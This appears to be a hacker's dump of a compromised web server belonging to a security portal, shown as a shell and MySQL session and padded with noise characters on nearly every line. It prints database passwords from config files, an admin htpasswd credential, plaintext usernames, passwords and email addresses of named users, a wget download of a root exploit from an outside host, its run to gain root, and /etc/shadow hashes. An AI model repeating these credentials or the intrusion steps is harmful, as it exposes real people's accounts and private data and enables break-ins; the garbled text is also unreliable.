: w: _0 p! ^. f, R' Cdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
4 T, z9 a) w% R$ B: ^# \- Mdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql5 l% D5 q- P8 C. K |8 ^3 N' @6 ^# q
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com- P: T' J& U9 z, _
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
4 u" `, O: t* `* C1 ]drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner# Y) H2 W; T8 M" @% o, F
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg* J: S% E3 ^( X. H( {1 |
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
! R- q& H! x" N* hdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
1 k" R: k5 j9 f$ m3 ^9 Edrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
t' \: ?3 E' A7 R-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php& y8 H) K( b: o: @2 ^
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico4 [3 X, h/ W5 {- C+ M8 s" _1 e" ~
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed% H5 a1 m$ ]! j) Z
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
1 U! W8 r8 G' D- @. U# K-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
u! o' L7 h" i. U-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
, ^3 G6 U: h5 x* Q: I8 N-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
' U4 A1 P: Q; J8 K7 r. d-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
) s, U' a5 L: E9 T; Y-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php4 t" J `3 ]2 t h1 u1 j3 D2 }# w
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php, Z4 a; U9 U) I' C2 Y
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
# J9 F6 Y' c" S( |5 V j: n- v Fdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
: q1 }( m1 \8 n. P3 W( K3 [drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
' D/ N9 T1 Y! `drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
0 U6 V) r6 a( p& |drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log L- r0 `5 F& b8 s/ g3 n
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
2 Y/ @4 M# T( A5 j- U: }drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata* ~$ h( T* j4 l% o
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
8 k( Z6 j8 h' n2 q7 \0 t-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
+ }4 O" F# Q) E+ K5 \- vdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re; y; P; s, B' b2 T7 k' ]
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
, A3 C" s: N2 @# A2 J# T( Adrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss, O1 ~, L) q$ ~/ `8 H' w
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources. { a- w3 B! M2 ~& W
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
2 a1 }- z- @. Ddrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes4 E% Q7 d) W& i1 o8 @
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src, y; v4 x! O4 Z, b7 z' ]$ A
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl/ ?, m" j9 w2 Z0 v8 p( s
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
5 B/ W" t+ n; Vdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
% l+ j$ O* o) Z, U0 X5 V-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
, U0 _+ s4 }3 E- w8 p+ bdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
! V3 a& C+ l; U* Z; f1 E# L' u4 g' w$ w* {$ E5 g; }( E, s9 X
sh-3.2$ head -20 index.php
+ V. t; ?1 K% z5 R& R* h<?PHP
8 a, s1 J, D9 c: @( x' L/**1 H5 B; t* K5 u9 }: O
* Mainfile (external) for astalavistaNET v2.0: m& K5 Z. n: k" x
*+ s b# w# H: o
* @copyright Astalavista IT Engineering GmbH
0 `# Z% G5 M+ z% a* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
l4 u" g- U0 \/ `7 P* @version 1.0% X+ B9 |5 |' `# [% N v" a
*/+ w3 P8 m2 A7 L* x& ~
; ^4 T" c0 }% m% u' x9 w* Z( v if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
. N6 f2 R+ P. e, y- i0 n, E $dontStartSession = false;7 C5 N- t q6 B& ?- e% M* }1 P
} else {3 B7 Y' ~9 R! x# t! B H l$ i0 s2 N
$dontStartSession = true;
4 `0 V$ j- D6 P! _! v% F4 m1 h/ A }1 H+ G, q( O1 a7 {0 a6 N. l2 S8 Q
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
2 ^- A+ e) o3 g2 r- r9 F( E2 d3 _ require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);5 A% v4 h- x% y5 n* K4 z
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);$ F& K" E# a' n7 y% r9 p, I9 j
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
& t5 ? R8 u/ x% d: @
# ^# ]% f: u. P" Msh-3.2$ cd config
- s4 d. f& m+ p8 a( ]5 Osh-3.2$ ls -la
8 c2 v$ `- c, j+ p/ D) a! Ytotal 32
( V' |3 [$ d7 Odrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .; l/ |+ b* d5 x
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..6 o" S: B5 v2 n/ f
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php# [$ p& \% m, [ {) B
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php; y0 j& W0 L# B3 ]. s3 a
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
6 f* P7 U7 n0 H$ v3 o( l/ Q' I6 R-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php4 q8 U. ^$ j3 ?/ L
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
, }: L' G+ e, P% Q: Y
$ g v# A" D* N3 `; Z/ rsh-3.2$ cat com.conf.php
! R, g0 o: L) H/ `6 [* B[snip]
& b5 s) N! G% i0 f$ D( T, R//member-database* r5 ?; s( p1 k$ U; |8 t( f
$_CONFIG['db_mem_server'] = ‘localhost’;
2 g3 o3 m2 g( I0 X$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;7 a8 a. i( y1 }9 o/ D
$_CONFIG['db_mem_user'] = ‘astanet_db’;
: i( T* [' N$ y$ d1 [$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
. Y8 p/ {0 x, @4 n% G$_CONFIG['db_mem_debug'] = false; //true or false
# ]% f. i) H8 G, B! F( ^+ Z6 X//ads-database
* G3 J1 T t+ N& @/ ^$_CONFIG['db_ads_server'] = ‘localhost’;
0 B4 @/ y, x+ s$_CONFIG['db_ads_database'] = ‘astanet_ads’;6 h1 K2 T$ T; ~0 w- j9 f1 I: o
$_CONFIG['db_ads_user'] = ‘astanet_db’; y" Q% J. h/ R! f* N* h
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
. f0 v& g4 J. ]0 u0 M2 f$_CONFIG['db_ads_debug'] = false; //true or false
: g. }1 C, p& b6 W* Q$ ~0 o2 k//rainbow-database: t' g7 ~% v9 T( K8 c
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
3 N5 `: I2 h) w1 H$_CONFIG['db_rainbow_database'] = ‘rainbow’;
' D$ d, D. v5 m4 B8 y& ~/ M$_CONFIG['db_rainbow_user'] = ‘dinu’;0 W! }1 _6 d: ~: L& R
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;" Y% a$ z: f0 R1 O5 N
$_CONFIG['db_rainbow_debug'] = false; //true or false8 N2 l7 Z! ]9 R& q( M, X; l! R
//mailing lists database9 p9 [' V" G" n: i' J# @* b3 y
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;! F: _) i% g% l7 v% |
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;0 L8 g8 Q+ _& S. B* Z0 D
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
: G5 ~' c- N# G4 v2 n4 [, [$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
8 H C+ J @" n) ?. O$ S$_CONFIG['db_mailing_lists_debug'] = false; //true or false6 I/ @$ y- R# `( E
//paypal6 Z- u* i4 ? L+ {# i
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;' m) u5 X: ~& y% z" l6 Y9 A
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;# n! p) `* `$ L3 _: u% u1 A4 u! e' ^
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
/ [( Q3 Q' T4 A$_CONFIG['sub_pp_noship'] = ‘1′;; q/ j) w' P' T* Y4 j. f% P
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
* x; e* ]% ?, `- Q. H* V9 H' b[snip]
) F) ^4 _4 X! w5 G& R1 L8 X9 Y; j0 M* K7 H5 m
sh-3.2$ cd ..; I0 o; j8 n+ N
sh-3.2$ cd member4 L1 M5 C2 }4 i1 V, d4 l
sh-3.2$ ls -la
2 n1 B7 b0 ^3 ]4 U$ T+ b0 m% Vtotal 20
# d$ C( E, |" `, v2 t- |. D7 Tdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
6 m# |2 j; E2 Q" o+ Y( D0 A, }drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..) A: x, s6 A5 d/ I6 U
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess- W% U" e" B: G, ?' X7 F
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php0 R1 l4 |6 |1 C) W& p2 m' a
sh-3.2$ cat .htaccess
9 L) l# _/ d0 s. nSecFilterEngine off6 I* P7 G; I+ [! B- @% K- t2 D9 d
: Z" r% O5 d6 q7 a6 ~! t0 }; Ush-3.2$ cd ..5 I; L0 h2 U* G; g" @
sh-3.2$ cd cron
7 y- `4 r' M) K1 X/ _sh-3.2$ ls -la
+ S. B S( }2 atotal 168
) p/ f3 c- I. q1 J/ A3 _ Idrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
' w" ]/ R E6 @1 Ddrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
' R: U+ i6 n5 x" q8 ^9 x/ j1 W/ G-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
" a* P. b' J% w, x7 z! k) d-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
0 C5 A1 \' l5 T6 l W, b N-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php' _. b* _4 f: r6 }) f5 k! `
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php' v! G& o1 I: z; D$ V- z% @' G, f* C
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php* B! o% |) ]% z
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php7 X: I0 L- ], g
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php% |" b k5 e" c! w! |4 }
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php8 } x! v' ]% O- p% c6 R- M
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh& } N3 e2 g/ p1 W
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php! O. D8 l- {, i3 ^- b* O0 v/ Z
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php3 }" k* ~0 m" e, d0 N# D
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php; F5 E4 C! ~6 p0 h. L
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
5 v: W! K6 k" x( o- M& t4 N-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
$ |) g- S- x$ [2 d4 b7 M-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php- L1 L' k0 E3 }9 @1 g5 d1 p
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
! `- G4 L, `* l-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php7 }( b& D! E3 U/ b P( K
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
) R0 m: Z8 i' ?drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email! P" }6 _) `6 M) e8 R3 H
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
- B" [" E, j4 ^# `' c-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
, Z, b R3 G7 o$ O$ ^8 Q* O
( a+ ^ J% B& C- k" g( S: fsh-3.2$ cd ..3 ?2 V% v5 j+ D/ S( t G
sh-3.2$ cd _007
4 d S6 t; w u& j# y [sh-3.2$ ls -la
/ i" B9 W. ?5 o6 `2 xtotal 24; n: f8 j: e" [$ g
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .3 k0 g5 d$ |3 l) K: p f
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
4 i2 f( r9 H( r7 H-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
8 l: `) C$ s- ~2 L; g) g-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
9 E1 a' ~( n' ^4 m7 M-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php: `$ a; W* [8 T- I4 @. F
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap: C! z' w3 R7 G& x$ `
1 o; y, o% B0 C4 h- s
sh-3.2$ cat .htaccess
: e( H( d9 L: {, rauthType Basic0 X( A+ M# c- e R& H& L, U, t
authName Admin
7 V v) S/ N/ C) d' wauthUserFile /home/astanet/auth/.htadm_pwd+ R3 ^4 `9 z/ r, Z" p; N9 [- M- u. m
require valid-user
, k: w" v9 E" v9 p, w! Z! _; @" D A+ z, l5 k
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
Z; t9 H9 }; g7 w8 n$ R! \& k+ q1 T. ladmin2net:CR0bl65MwhfT
2 s6 T; n; m+ {6 K$ M. C) C( P( c, i3 N D7 q( x4 T
sh-3.2$ mysql -u astanet_db -p
& B1 L" o# ~7 c) cEnter password:# Z8 q# V2 a6 o1 {* {- q
Welcome to the MySQL monitor. Commands end with ; or \g.
8 s g+ ], y, h- GYour MySQL connection id is 275153
, J" ^! F0 W/ ~ ]: K: [* [; Y8 kServer version: 5.0.45-community-log MySQL Community Edition (GPL)1 `6 p5 V# W) ^* N* Y
& Y% Q# s; h, C0 F0 EType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.! k0 w7 c V$ \0 K2 p; v! j; D# s
1 R& `0 g/ S, h% ]' A rmysql> show databases;
8 Y. T; L* M3 ?+———————–+* A: L1 ~+ G0 f" X4 `
| Database |
0 k4 p+ E K1 O9 m$ U$ c+———————–+% O' X0 y- ^7 g0 w9 ?" X, N
| information_schema |8 V4 R( J* \, l" r9 |5 b
| astanet_ads |% G' B. d5 B1 B3 c$ A$ W
| astanet_mailing_lists |
! c; O' Q' E, ^ D' R% \0 ^4 J" y| astanet_mediawiki |: n! L3 W" B: G8 M/ H: K1 q5 Y
| astanet_membersystem |4 G( N* t2 b8 g$ @8 \. N( Z3 ]
| test |/ ^( V: p! i1 M& D b* v
+———————–++ o3 I& A0 c' K" i2 L- x2 X
6 rows in set (0.00 sec)9 d* m: _# o6 ^; B
* a3 Y: L& j7 u! \2 z2 S
mysql> use astanet_membersystem. m/ r$ ? e2 z1 G+ g
Database changed
" V2 g K! n* Omysql> show tables;8 q6 @2 u. _2 r; i D T
+———————————–+1 E7 Y. l6 I- ~# l2 f/ x
| Tables_in_astanet_membersystem |% O; E8 a- g9 o2 w# r: ?1 G5 I
+———————————–+
$ J0 \7 }6 K; G& N9 N u+ B6 \| blacklist_categories |2 C( M. o6 S: Z$ U
| blacklist_content |
9 L6 ^. E; }& R9 Y| blacklist_levels |2 I, f3 F$ N3 N9 S- n! M
| blacklist_mcset |
4 | Y5 J1 `# s3 X| dir_categories |
/ h! S+ k3 X7 C. ^$ k3 }! Z; V) a| dir_comments |
0 T; F% e5 p- v| dir_links |4 O, N3 r% i. M
| dir_temp |
3 c- w6 N8 ~- Y9 ?9 J| dir_votes |
% i, o+ \: V4 ~; F6 K| documents |
) |, q+ }) v5 }0 c| documents_categories |
2 W( K4 ]4 V* o) A% ?, m9 |5 T| email_content |
+ T w* y: J. L3 S9 C0 x4 N| email_settings |% m+ V& x) S) e8 T
| exploits |
, u4 @/ R- }+ m* V| exploits_categories |. e2 w( ^8 `( D2 ?; A9 q( B
| exploittree_categories |
8 c& b5 i# ^0 k9 P| exploittree_exploits |
( a8 a" ]; j7 P| home_values |; a5 Q5 I4 I! Z
| iso_countries |
, _! V/ p3 }8 h: L. j( ^) S' w! ^. q0 k| links_categories |% q9 s& T* J; v# c5 B
| links_records |: {0 ^: T3 L4 w3 ]
| links_unauth |
) ?8 t& n. o/ X) W' k( ^| links_votes |6 G: r' }! b$ e* d6 ]/ ^/ _9 e
| log |3 r1 r9 G, x, s; m6 {9 m
| news_categories |( T& v" A+ h: h$ Z
| news_comments |
, j6 S1 _& S6 x5 W u: { U| news_emoticons |
; `8 F. a: X4 A3 P2 Y. R# F! y| news_latest |
/ |7 b4 R& [6 u9 S6 Q* p| news_messages |
1 I. ?4 x9 o; a* N# ~: V+ w| news_statistics |& t5 x9 R" R+ R* J+ o
| news_votes |5 K) i9 {, h1 H0 l- N- ?" r u
| prices_content |0 D$ }. x9 k+ X, D8 b9 v
| prices_offers |5 V" e- G, R8 }
| rss_settings |
3 [5 j: ~9 o' s6 f# w7 ^( R| sessions |
s9 E$ f% c) B& u) O1 x, a| stats_signups |, Z7 k' x7 d" J8 E
| u2u2 |
9 O1 x8 W S" o" ]* C| u2u_contact |
( _4 T2 ]+ [$ {7 h| u2u_settings | ^9 A/ X* P/ F9 I; ]
| user_keywords_selected_categories |
2 X- X& o% p- w| users |
, a8 a8 \# L' q4 H+ z0 J' m' c| users_ipn_test |
: Q+ n4 k- {6 V| users_keyword_values |
/ j o8 N( B* A& t| users_profile |9 D, c4 r7 V' H& H' N" {6 t, @2 i8 h
| users_temp |
: L6 z. b: l) f* n0 y3 P, n| users_upgrade |
m0 q$ V8 ?6 j% r8 r' x+———————————–+) E! C) R" w ]+ ]: E7 [( X9 o
46 rows in set (0.00 sec)
* s0 ]( R Y1 }7 j7 f2 Z8 f, D# F U9 \, h
mysql> describe users;
' A0 Q3 \, g5 D7 ^2 p5 @7 l+————————–+————————————–+——+—–+———————+—————-+7 Z; f" o; m5 ^$ P4 l
| Field | Type | Null | Key | Default | Extra |8 {: \7 q: C* T/ W$ m) b# i
+————————–+————————————–+——+—–+———————+—————-+
% h; S, @6 a, N* @* H| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |* z' s2 h9 Z! j! m! z% l4 k+ T( F( C
| user | varchar(50) | NO | | | |
' Q+ _! F. r( d2 E' T( Q9 O| nickname | varchar(30) | NO | MUL | anonymous | |9 S, {, y- m" c. D7 j+ ^' i
| password | varchar(30) | NO | | | |
7 H! G5 [( S: d! T& l1 C| userlevel | tinyint(3) | YES | MUL | NULL | |4 j% v+ ~1 ?, ^/ ~# g% n
| exp | int(8) unsigned | NO | | 0 | |) E4 K$ C; n( B
| email | varchar(50) | NO | | | |
- D& B% W' D6 y$ ?| ip | varchar(15) | NO | | 0 | |
! w! [+ Z& t/ Z| proxy | set(’0′,’1′) | NO | | 0 | |: h& U$ ^8 n, R' K1 N
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |1 J0 l5 w+ n! n
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |7 g! @/ w9 s, X8 H9 x: E+ X
| anz_in | tinyint(1) | NO | | -1 | |
3 K0 P) K. a1 w& O& H6 o2 W4 ?2 [| status | tinyint(1) unsigned | NO | | 0 | |# k4 ~6 G3 H( }
| checked | set(’0′,’1′,’2′) | NO | | 0 | |4 S1 f, U0 [4 h9 n# u8 ^2 y
| freemember | set(’0′,’1′) | NO | | 0 | |
l! \$ M0 d1 ?- m( K7 T n| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
# D6 D( I1 C" i$ _| lang | tinytext | NO | | | |
" g) N$ F) Y2 m' S; u/ M$ R| adid | smallint(6) | NO | | 0 | |% R, i2 w- X' s) B: {( {& R
| pp_txn_id | varchar(255) | YES | | NULL | |. K3 b0 W" m6 K+ H. F: e8 I, D* c
| cnb_transaction_id | varchar(255) | YES | | NULL | |' d' U% Y; H% e# J$ P5 @
| cnb_order_id | varchar(255) | YES | | NULL | |" q, \% y: C0 V3 T3 L, n
| cnb_user_id | int(11) | YES | | 0 | |
( T: u1 I" x+ e1 @# t {+————————–+————————————–+——+—–+———————+—————-+
! d4 ]* _: S6 G: [0 A& }& J22 rows in set (0.01 sec)
0 K9 T/ C$ _2 _ h# o' e: a/ K; L4 u( X7 v0 c
mysql> select count(*) as skids from users;2 I- _, Q+ R4 N. [, g9 L
+——-+
6 N+ [2 V8 E" j6 Z: u| skids |
# `, J( m/ I% D# j3 c- p, N' h$ }: ?+——-+
% T0 D9 j7 I) H8 J- [5 e| 25199 |. b& S4 \& |( F& c" M1 H
+——-+
8 f7 h |* ~. g4 d* x1 row in set (0.00 sec)
. Y2 w4 b- z1 X/ r5 L7 Q' S5 Y& \$ `1 ?) h% x% T* S
mysql> select user,nickname,password,email from users where userlevel = 1;
: B+ z9 x( Y7 S+————————–+———————-+——————+———————————–+0 i& ?1 I. ^# o w3 |' ?% g
| user | nickname | password | email |7 ~3 s3 b' M @2 t6 C
+————————–+———————-+——————+———————————–+
% w- I) s& J5 S' @8 Q& o5 N| pascal | prozac | astaman3 | 链接标记info@astalavista.net |) B, z- | E6 y2 P
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |% h8 W5 e' d! H2 B
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |6 Q1 e) A! j- i% u
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
' v7 Y6 f! i/ a) ~2 || Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
( {% C" R3 |5 l* B& e$ n2 j| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |, O4 k% {! h( u& m1 r
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
% w7 R3 V, e! Y$ { D0 S| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
$ M* p9 C% T2 ~( s. c, D/ \| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
3 X ^0 H: T7 k0 V4 m. I8 g| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
; t% C- M0 _; \6 i; n7 z* L| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
4 a! O/ m8 {6 g8 ^8 ^4 [0 V- _| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |' B1 h# A8 K8 [. A9 y$ ]
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
, S1 @1 p' G% j- i7 W3 A; d I| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
2 @ Y2 g( F( Y% u- b| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |* D2 ~, I3 C+ \6 O! m' _1 b) x
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
$ H0 }6 {6 m1 G/ k0 M$ q| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
. X) V+ |. ]: _7 c' R| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
% j2 r5 w0 c" x8 [7 o. `% z| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |# R8 f9 [+ n+ E$ D
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |. ^# ]/ R n, i; n4 U
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
* y. f6 Y7 G7 K$ h7 O3 U* || Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |( U( X" _. m, J* t" P8 V* E8 G1 l
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |1 _) G. C( m# S: Z
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |0 R9 V7 |! q! i0 j# ]9 p& K
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
5 b. |6 ~7 j$ S2 K| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
! X1 U# u" f7 \) q5 W/ l7 e| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |6 t. R8 l$ K, q4 c4 g9 ~, k+ }
+————————–+———————-+——————+———————————–+* @5 ~$ Y& C( \/ X( J
27 rows in set (0.00 sec)
8 F$ r* H9 x: D- A/ l8 _/ W+ W$ w( v; x5 g S* q+ y" V& O
mysql> exit;
. _5 [3 p7 ^! k6 d _Bye; i) a/ w( C: d& u$ r
% \' K ?6 b8 n, i[~] plaintext passwords? yes,
) k# R5 z' h8 X$ w8 @7 p+ OThose so called “security professionals” who charge you $6.66 / month to' B$ j7 }1 ]: T
register at their hack-proof portal, save your passwords in plaintext…: d: ?6 ~7 b( O2 H; B0 C3 u% q
brilliant!9 i: F) f1 K1 A9 Q" O4 i
/ u7 D# r" r5 w, p" s' K
[~] This been fun but we want more., E# @4 G- _/ p0 {) R
# ~: m9 y* R' E# P: O( _- q- r. }# Fsh-3.2$ uname -a
' ?9 U; c! W/ T" l5 bLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
9 ^/ W( e$ W2 u" n3 O$ w! Qsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
$ d" z3 q; v, q4 T–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
, c o, t6 n4 h& S- l1 MResolving anti.sec.labs… 13.33.33.37% B) U5 W: D% i, {- j# [
Connecting to anti.sec.labs|13.33.33.37|:80… connected.- w# q' J4 C; n9 O' e
HTTP request sent, awaiting response… 200 OK3 i* \* c; i1 N) D
Length: 18200 (18K) [text/plain]
' c9 S0 B4 _' Z% O8 W# R+ ]8 Q1 l' OSaving to: `g0troot’
; a# c) I \$ v* z
5 o* n) a# ]5 c1 b' K100%[=========================================================================================================================================>] 18,200 58.6K/s in% P) b% H- ^) k7 q
0.3s
; Q( a* [3 G! c
~$ W3 N7 s8 t" P18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
$ G$ J; d% U8 L' z& V9 j s0 T6 L& R1 P
sh-3.2$ ./g0troot -i x86_646 k2 x/ h; n1 r# x3 Q
[+] g0troot - anti.sec.labs' H/ L: o6 Q$ E, h- _% N: w
[+] Target: 2.6.18-128.1.10.el5. U* B% h0 e3 f" V8 w6 j
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
0 T! h$ t$ g3 t* u% |
0 w8 K! b3 s( c0 A9 k# D) H[+] r00tr00t9 `9 E& j# o- b: |7 o2 c; e1 w
[~] Executing shell…
2 X/ S. j1 Y" q; Z/ T5 M# s( l
$ S7 K' [( S4 z9 tsh-3.2# id
7 x, L2 Q+ Y8 huid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
. K. ^- X% V; H6 p; A6 f4 b) {$ |$ K5 Z* x- b( v% s
sh-3.2# cat /etc/shadow. v4 C5 X- U m3 H
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
2 d2 Y8 l9 ?+ a& L7 O) R5 D[snip]$ p! B! a |: H! h. |8 q
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
/ M) q* Y2 X& v7 ? cjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::& A9 ]; g1 I1 B2 w
